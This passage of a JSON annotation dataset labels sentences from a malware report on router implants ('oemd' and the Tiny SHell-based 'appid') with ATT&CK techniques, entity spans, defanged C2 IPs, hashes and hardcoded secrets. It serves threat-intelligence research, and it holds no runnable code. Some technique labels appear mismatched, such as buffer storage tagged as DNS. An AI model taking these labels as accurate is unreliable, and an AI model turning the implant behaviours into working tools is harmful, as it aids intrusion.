"context_before": "If the RTS environment variable is initialized, then the Interface Index is picked up from there.", "sentence_text": "It is ensured in each scenario that the global memory is initialized with appropriate data containing the interface index.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p21-s308-cea8e6", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 308, "context_before": "It is ensured in each scenario that the global memory is initialized with appropriate data containing the interface index.", "sentence_text": "Receiving Data on the opened File Descriptors After setting up the appropriate UDP port on the interface and binding, the daemon starts polling all the interfaces indefinitely.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Start polling all interfaces indefinitely on bound UDP ports", "entities": [ { "text": "daemon", "start": 122, "end": 128, "label": "MalwareTool" }, { "text": "starts polling all the interfaces indefinitely.", "start": 129, "end": 176, "label": "Action" }, { "text": "UDP port", "start": 79, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "opened File Descriptors", "start": 22, "end": 45, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p21-s309-119223", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 309, "context_before": "Receiving Data on the opened File Descriptors After setting up the appropriate UDP port on the interface and binding, the daemon starts polling all the interfaces indefinitely.", "sentence_text": "If any error occurs, closes all the file descriptors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p21-s310-cb47f9", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 310, "context_before": "If any error occurs, closes all the file descriptors.", "sentence_text": "If it receives any data, the data is stored in a buffer.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "Store received data in buffer for processing", "entities": [ { "text": "data is stored in a buffer.", "start": 29, "end": 56, "label": "Action" }, { "text": "receives any data", "start": 6, "end": 23, "label": "Action" }, { "text": " buffer", "start": 48, "end": 55, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p21-s311-a978c3", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 311, "context_before": "If it receives any data, the data is stored in a buffer.", "sentence_text": "The process is then forked and passed to a callback function that initiates the necessary environment to set up the C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Fork process and pass to callback function for C2 server setup", "entities": [ { "text": "process is then forked", "start": 4, "end": 26, "label": "Action" }, { "text": " passed to a callback function", "start": 30, "end": 60, "label": "Action" }, { "text": "initiates the necessary environment to set up", "start": 66, "end": 111, "label": "Action" }, { "text": "callback function", "start": 43, "end": 60, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p21-s312-c58280", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 312, "context_before": "The process is then forked and passed to a callback function that initiates the necessary environment to set up the C2 server.", "sentence_text": "Passing Control to the C2 Functions", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p21-s313-354bbc", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 313, "context_before": "Passing Control to the C2 Functions", "sentence_text": "The callback function performs some address manipulation and calls another function with the input that is received from the file descriptors and global data written in memory.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Callback function performs address manipulation and processes received data", "entities": [ { "text": "callback function performs some address manipulation", "start": 4, "end": 56, "label": "Action" }, { "text": "calls another function with the input", "start": 61, "end": 98, "label": "Action" }, { "text": "file descriptors", "start": 125, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "global data written in memory.", "start": 146, "end": 176, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p21-s314-b7ed8b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 314, "context_before": "The callback function performs some address manipulation and calls another function with the input that is received from the file descriptors and global data written in memory.", "sentence_text": "This data contains a list of targets containing remote IP Addresses.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Process target list containing remote IP addresses", "entities": [ { "text": "data contains a list of targets", "start": 5, "end": 36, "label": "Action" }, { "text": "remote IP Addresses.", "start": 48, "end": 68, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p21-s315-f7d681", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 315, "context_before": "This data contains a list of targets containing remote IP Addresses.", "sentence_text": "The function gets the name of the interfaces and then creates a new session.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Get interface names and create new session", "entities": [ { "text": "gets the name of the interfaces", "start": 13, "end": 44, "label": "Action" }, { "text": "creates a new session.", "start": 54, "end": 76, "label": "Action" }, { "text": "interfaces", "start": 34, "end": 44, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p21-s316-4522aa", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 316, "context_before": "The function gets the name of the interfaces and then creates a new session.", "sentence_text": "It then closes all the file descriptors for the new session and sets up a new socket for TCP connections.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Close file descriptors and setup new TCP socket for session", "entities": [ { "text": "closes all the file descriptors", "start": 8, "end": 39, "label": "Action" }, { "text": "sets up a new socket for TCP connections", "start": 64, "end": 104, "label": "Infrastructure_Indicator" }, { "text": "new session", "start": 48, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "TCP connections", "start": 89, "end": 104, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p21-s317-61f0da", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 317, "context_before": "It then closes all the file descriptors for the new session and sets up a new socket for TCP connections.", "sentence_text": "A TCP connection is established to the remote target and then the C2 function is called.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Establish TCP connection to remote target and call C2 function", "entities": [ { "text": "TCP connection is established ", "start": 2, "end": 32, "label": "Action" }, { "text": "C2 function is called.", "start": 66, "end": 88, "label": "Action" }, { "text": "remote target", "start": 39, "end": 52, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p21-s318-b033b9", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 318, "context_before": "A TCP connection is established to the remote target and then the C2 function is called.", "sentence_text": "The C2 Function", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p21-s319-7f0b71", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 319, "context_before": "The C2 Function", "sentence_text": "The function receives a message from the file descriptor created earlier.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Receive message from file descriptor for C2 processing", "entities": [ { "text": "receives a message", "start": 13, "end": 31, "label": "Action" }, { "text": "file descriptor", "start": 41, "end": 56, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p21-s320-4deaaf", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 320, "context_before": "The function receives a message from the file descriptor created earlier.", "sentence_text": "Command Details\nThis section describes the various commands that are received by oemd and executed on the target device through the C2 function.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p21-s321-5b04af", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 321, "context_before": "Command Details\nThis section describes the various commands that are received by oemd and executed on the target device through the C2 function.", "sentence_text": "Command \\x01 - Read a File", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Read file using command \\x01", "entities": [ { "text": "Command \\x01", "start": 0, "end": 12, "label": "Infrastructure_Indicator" }, { "text": "Read a File", "start": 15, "end": 26, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p21-s322-aeb0d6", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 322, "context_before": "Command \\x01 - Read a File", "sentence_text": "The command \\x01 is used to read a file.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Read file using command \\x01", "entities": [ { "text": "command \\x01", "start": 4, "end": 16, "label": "Infrastructure_Indicator" }, { "text": "read a file.", "start": 28, "end": 40, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p21-s323-e1ff5c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 21, "sentence_id": 323, "context_before": "The command \\x01 is used to read a file.", "sentence_text": "This includes functionality to send it back to the remote host after encrypting it.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Encrypt and send file back to remote host", "entities": [ { "text": "send it back to the remote host", "start": 31, "end": 62, "label": "Action" }, { "text": "after encrypting it.", "start": 63, "end": 83, "label": "Action" }, { "text": "remote host", "start": 51, "end": 62, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p22-s324-f9a33d", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 22, "sentence_id": 324, "context_before": "This includes functionality to send it back to the remote host after encrypting it.", "sentence_text": "Command \\x02 - Write a File", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Write file using command \\x02", "entities": [ { "text": "Write a File", "start": 15, "end": 27, "label": "Action" }, { "text": "Command \\x02", "start": 0, "end": 12, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p22-s325-c69468", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 22, "sentence_id": 325, "context_before": "Command \\x02 - Write a File", "sentence_text": "The command \\x02 is used to write a file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Write file using command \\x02", "entities": [ { "text": "command \\x02", "start": 4, "end": 16, "label": "Infrastructure_Indicator" }, { "text": "write a file.", "start": 28, "end": 41, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p22-s326-37e5dc", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 22, "sentence_id": 326, "context_before": "The command \\x02 is used to write a file.", "sentence_text": "The first set of bytes defines the path of the file to be written.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Define file path from first set of bytes for writing", "entities": [ { "text": "defines the path of the file", "start": 23, "end": 51, "label": "Action" }, { "text": "first set of bytes", "start": 4, "end": 22, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p22-s327-d141dc", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 22, "sentence_id": 327, "context_before": "The first set of bytes defines the path of the file to be written.", "sentence_text": "It is then created using the creat().", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Create file using creat() system call", "entities": [ { "text": "created using the creat().", "start": 11, "end": 37, "label": "Action" }, { "text": "creat().", "start": 29, "end": 37, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p22-s328-2c671c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 22, "sentence_id": 328, "context_before": "It is then created using the creat().", "sentence_text": "Command \\x03 - Start a shell The command \\x03 starts a shell after setting some environment variables which it receives from the remote server.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Start shell using command \\x03 with environment variables from remote server", "entities": [ { "text": "Command \\x03", "start": 0, "end": 12, "label": "Infrastructure_Indicator" }, { "text": "remote server.", "start": 129, "end": 143, "label": "Infrastructure_Indicator" }, { "text": "Start a shell", "start": 15, "end": 28, "label": "Action" }, { "text": " setting some environment variables ", "start": 66, "end": 102, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p22-s329-88d582", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 22, "sentence_id": 329, "context_before": "Command \\x03 - Start a shell The command \\x03 starts a shell after setting some environment variables which it receives from the remote server.", "sentence_text": "The HISTFILE is set to NULL to remove trace of which commands the attacker ran.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Set HISTFILE to NULL to remove command history traces", "entities": [ { "text": "HISTFILE is set to NULL", "start": 4, "end": 27, "label": "Action" }, { "text": "remove trace of which commands", "start": 31, "end": 61, "label": "Action" }, { "text": "HISTFILE", "start": 4, "end": 12, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p22-s330-74172e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 22, "sentence_id": 330, "context_before": "The HISTFILE is set to NULL to remove trace of which commands the attacker ran.", "sentence_text": "The TERM is defined by the remote host.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Set TERM environment variable from remote host", "entities": [ { "text": "TERM is defined by the remote host.", "start": 4, "end": 39, "label": "Action" }, { "text": "TERM", "start": 4, "end": 8, "label": "Infrastructure_Indicator" }, { "text": "remote host.", "start": 27, "end": 39, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p22-s331-9b6a3d", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 22, "sentence_id": 331, "context_before": "The TERM is defined by the remote host.", "sentence_text": "The shell being utilized is /bin/sh.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Utilize /bin/sh shell for command execution", "entities": [ { "text": "/bin/sh.", "start": 28, "end": 36, "label": "Infrastructure_Indicator" }, { "text": "shell being utilized", "start": 4, "end": 24, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p22-s332-1b8508", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 22, "sentence_id": 332, "context_before": "The shell being utilized is /bin/sh.", "sentence_text": "The data being sent to and from the shell is being encrypted by the same routines being used for the C2 interface.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Encrypt shell data using C2 encryption routines", "entities": [ { "text": "data being sent to and from the shell is being encrypted", "start": 4, "end": 60, "label": "Action" }, { "text": "C2 interface.", "start": 101, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "same routines being used", "start": 68, "end": 92, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p22-s333-f54867", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 22, "sentence_id": 333, "context_before": "The data being sent to and from the shell is being encrypted by the same routines being used for the C2 interface.", "sentence_text": "Call Graph\nThe call graph for the oemd implant is given below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p22-s334-d091a4", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 22, "sentence_id": 334, "context_before": "Call Graph\nThe call graph for the oemd implant is given below.", "sentence_text": "Junos OS Specific Actions", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p22-s335-49de54", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 22, "sentence_id": 335, "context_before": "Junos OS Specific Actions", "sentence_text": "The use of ifinfo with the grep of \"local-index\" indicates the malware might be customized for Junos OS.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1016", "name": "System Network Configuration Discovery" } ], "procedure": "Use ifinfo with 'local-index' grep for Junos OS targeting", "entities": [ { "text": "use of ifinfo with the grep of \"local-index\"", "start": 4, "end": 48, "label": "Action" }, { "text": "Junos OS", "start": 95, "end": 103, "label": "Infrastructure_Indicator" }, { "text": "\"local-index\"", "start": 35, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "ifinfo", "start": 11, "end": 17, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p22-s336-69c5fa", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 22, "sentence_id": 336, "context_before": "The use of ifinfo with the grep of \"local-index\" indicates the malware might be customized for Junos OS.", "sentence_text": "There are no other indicators of specific actions taking place related to Junos OS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p23-s337-297011", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 23, "sentence_id": 337, "context_before": "There are no other indicators of specific actions taking place related to Junos OS.", "sentence_text": "A Poorly Plagiarized Implant Daemon (appid)\nThe implant appid is a modified version of the Tiny SHell open-source malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p23-s338-09dfe5", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 23, "sentence_id": 338, "context_before": "A Poorly Plagiarized Implant Daemon (appid)\nThe implant appid is a modified version of the Tiny SHell open-source malware.", "sentence_text": "Most of the core functionality of this implant is derived from Tiny SHell.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Core functionality derived from Tiny SHell malware", "entities": [ { "text": "implant", "start": 39, "end": 46, "label": "MalwareTool" }, { "text": "Tiny SHell.", "start": 63, "end": 74, "label": "MalwareTool" }, { "text": "core functionality of this implant is derived from", "start": 12, "end": 62, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p23-s339-f65189", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 23, "sentence_id": 339, "context_before": "Most of the core functionality of this implant is derived from Tiny SHell.", "sentence_text": "The source code for Tiny SHell can be found here: https://github.com/creaktive/tsh.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p23-s340-439450", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 23, "sentence_id": 340, "context_before": "The source code for Tiny SHell can be found here: https://github.com/creaktive/tsh.", "sentence_text": "Besides this, appid implant contains multiple hard-coded IP addresses which it attempts to connect back to at random.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Connect to multiple hard-coded IP addresses at random", "entities": [ { "text": " appid implant", "start": 13, "end": 27, "label": "MalwareTool" }, { "text": "attempts to connect back to at random", "start": 79, "end": 116, "label": "Action" }, { "text": " hard-coded IP addresses", "start": 45, "end": 69, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p23-s341-ec0d12", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 23, "sentence_id": 341, "context_before": "Besides this, appid implant contains multiple hard-coded IP addresses which it attempts to connect back to at random.", "sentence_text": "Executable File Details Title Description File Name appid File Path /usr/sbin/appid File Type appid: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld- elf.so.1, for FreeBSD 6.4, not stripped File Size 59248 bytes SHA1 50520639cf77df0c15cc95076fac901e3d04b708 Hash SHA256 98380ec6bf4e03d3ff490cdc6c48c37714450930e4adf82e6e14d244d8 Hash 373888 ssdeep 768:EccHS1XhZkoAv9VuQ9FE5J9Fd2j79dX9iEbasKO8krzREEReahodS4 hash ARoFHZ2h:", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deployment of appid executable with detailed file artifacts", "entities": [ { "text": "appid", "start": 52, "end": 57, "label": "MalwareTool" }, { "text": "/usr/sbin/appid", "start": 68, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "ELF 32-bit LSB executable", "start": 101, "end": 126, "label": "Infrastructure_Indicator" }, { "text": "SHA1 50520639cf77df0c15cc95076fac901e3d04b708", "start": 269, "end": 314, "label": "Infrastructure_Indicator" }, { "text": "SHA256 98380ec6bf4e03d3ff490cdc6c48c37714450930e4adf82e6e14d244d8 ", "start": 320, "end": 386, "label": "Infrastructure_Indicator" }, { "text": "373888 ssdeep 768:EccHS1XhZkoAv9VuQ9FE5J9Fd2j79dX9iEbasKO8krzREEReahodS4", "start": 391, "end": 463, "label": "Infrastructure_Indicator" }, { "text": "ARoFHZ2h:", "start": 469, "end": 478, "label": "Infrastructure_Indicator" }, { "text": "FreeBSD", "start": 152, "end": 159, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p23-s342-905e34", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 23, "sentence_id": 342, "context_before": "Executable File Details Title Description File Name appid File Path /usr/sbin/appid File Type appid: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld- elf.so.1, for FreeBSD 6.4, not stripped File Size 59248 bytes SHA1 50520639cf77df0c15cc95076fac901e3d04b708 Hash SHA256 98380ec6bf4e03d3ff490cdc6c48c37714450930e4adf82e6e14d244d8 Hash 373888 ssdeep 768:EccHS1XhZkoAv9VuQ9FE5J9Fd2j79dX9iEbasKO8krzREEReahodS4 hash ARoFHZ2h:", "sentence_text": "aeWH9ZH9l9D9KO8mzREqsdS4ARoF52h Implant Analysis This implant is based on the Tiny SHell UNIX backdoor.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "appid implant based on Tiny SHell UNIX backdoor", "entities": [ { "text": "implant", "start": 54, "end": 61, "label": "MalwareTool" }, { "text": "Tiny SHell UNIX backdoor", "start": 78, "end": 102, "label": "Infrastructure_Indicator" }, { "text": "aeWH9ZH9l9D9KO8mzREqsdS4ARoF52h", "start": 0, "end": 31, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p23-s343-82f155", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 23, "sentence_id": 343, "context_before": "aeWH9ZH9l9D9KO8mzREqsdS4ARoF52h Implant Analysis This implant is based on the Tiny SHell UNIX backdoor.", "sentence_text": "Most of the core functionality of this implant can be understood by looking at the Tiny SHell source code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p23-s344-0d0483", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 23, "sentence_id": 344, "context_before": "Most of the core functionality of this implant can be understood by looking at the Tiny SHell source code.", "sentence_text": "This section will focus on the modifications made to Tiny SHell by the malware author to make it useful.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p23-s345-5849c7", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 23, "sentence_id": 345, "context_before": "This section will focus on the modifications made to Tiny SHell by the malware author to make it useful.", "sentence_text": "Artifacts Found\nArtifact Name Description PEL secret A hardcoded secret was found at virtual address 0xc8055a6c with value 88-e8b17616fbbd SOCKS secret A hardcoded secret was found at virtual address 0xc8055a70 with value fb-75c043b82127 Connect Back A hardcoded Interface was found at virtual address Interface 0x08055a74 with value \"ge/0/2/8.0\".", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Multiple hardcoded secrets and interface for C2 communication", "entities": [ { "text": "virtual address Interface 0x08055a74", "start": 286, "end": 322, "label": "Infrastructure_Indicator" }, { "text": "virtual address 0xc8055a6c", "start": 85, "end": 111, "label": "Infrastructure_Indicator" }, { "text": "virtual address 0xc8055a70", "start": 184, "end": 210, "label": "Infrastructure_Indicator" }, { "text": "SOCKS secret", "start": 139, "end": 151, "label": "Infrastructure_Indicator" }, { "text": "fb-75c043b82127", "start": 222, "end": 237, "label": "Infrastructure_Indicator" }, { "text": "Interface", "start": 263, "end": 272, "label": "Infrastructure_Indicator" }, { "text": "ge/0/2/8.0", "start": 335, "end": 345, "label": "Infrastructure_Indicator" }, { "text": "PEL secret", "start": 42, "end": 52, "label": "Infrastructure_Indicator" }, { "text": "88-e8b17616fbbd ", "start": 123, "end": 139, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p23-s346-850b55", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 23, "sentence_id": 346, "context_before": "Artifacts Found\nArtifact Name Description PEL secret A hardcoded secret was found at virtual address 0xc8055a6c with value 88-e8b17616fbbd SOCKS secret A hardcoded secret was found at virtual address 0xc8055a70 with value fb-75c043b82127 Connect Back A hardcoded Interface was found at virtual address Interface 0x08055a74 with value \"ge/0/2/8.0\".", "sentence_text": "This interface is a Juniper specific one.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Juniper-specific network interface targeting", "entities": [ { "text": "Juniper specific one.", "start": 20, "end": 41, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p23-s347-0849f8", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 23, "sentence_id": 347, "context_before": "This interface is a Juniper specific one.", "sentence_text": "Connect Back IP1 A hardcoded IP address was found at virtual address 0x08055a88 with value \"129[.]126[.]109[.]50\" Connect Back IP2 A hardcoded IP address was found at virtual address 0x08055a98 with value \"116[.]88[.]34[.]184\"", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Multiple hardcoded C2 IP addresses for connect back", "entities": [ { "text": "IP addres", "start": 29, "end": 38, "label": "Infrastructure_Indicator" }, { "text": "129[.]126[.]109[.]50", "start": 92, "end": 112, "label": "Infrastructure_Indicator" }, { "text": " IP address", "start": 142, "end": 153, "label": "Infrastructure_Indicator" }, { "text": "116[.]88[.]34[.]184", "start": 206, "end": 225, "label": "Infrastructure_Indicator" }, { "text": "virtual address 0x08055a88", "start": 53, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "virtual address 0x08055a98", "start": 167, "end": 193, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p24-s348-250306", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 348, "context_before": "Connect Back IP1 A hardcoded IP address was found at virtual address 0x08055a88 with value \"129[.]126[.]109[.]50\" Connect Back IP2 A hardcoded IP address was found at virtual address 0x08055a98 with value \"116[.]88[.]34[.]184\"", "sentence_text": "Connect Back IP3", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p24-s349-5f410e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 349, "context_before": "Connect Back IP3", "sentence_text": "A hardcoded IP address was found at virtual address 0x08055aa8 with value \"223[.]25[.]78[.]136\" Connect Back IP4 A hardcoded IP address was found at virtual address 0x08055ab8 with value \"45[.]77[.]39[.]28\" Connect Back A hardcoded port value was found at virtual address Port 0x08055a64 with value \"22\".", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Additional hardcoded C2 IPs and port 22 for connect back", "entities": [ { "text": "IP address", "start": 12, "end": 22, "label": "Infrastructure_Indicator" }, { "text": "223[.]25[.]78[.]136", "start": 75, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "IP address", "start": 125, "end": 135, "label": "Infrastructure_Indicator" }, { "text": "45[.]77[.]39[.]28", "start": 188, "end": 205, "label": "Infrastructure_Indicator" }, { "text": "Port 0x08055a64", "start": 272, "end": 287, "label": "Infrastructure_Indicator" }, { "text": "22", "start": 300, "end": 302, "label": "Infrastructure_Indicator" }, { "text": "virtual address 0x08055aa8", "start": 36, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "virtual address 0x08055ab8", "start": 149, "end": 175, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p24-s350-df8e8e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 24, "sentence_id": 350, "context_before": "A hardcoded IP address was found at virtual address 0x08055aa8 with value \"223[.]25[.]78[.]136\" Connect Back IP4 A hardcoded IP address was found at virtual address 0x08055ab8 with value \"45[.]77[.]39[.]28\" Connect Back A hardcoded port value was found at virtual address Port 0x08055a64 with value \"22\".", "sentence_text": "Challenge Value A hardcoded 16-byte challenge value was found at virtual address 0x080531cc with value \\x58\\x90\\xae\\x86\\xf1\\xb9\\x1c\\xf6\\x29\\x83\\x95\\x71\\x 1d\\xde\\x58\\x0d Malware Activation Logic", "relevant": "yes", "tactic": 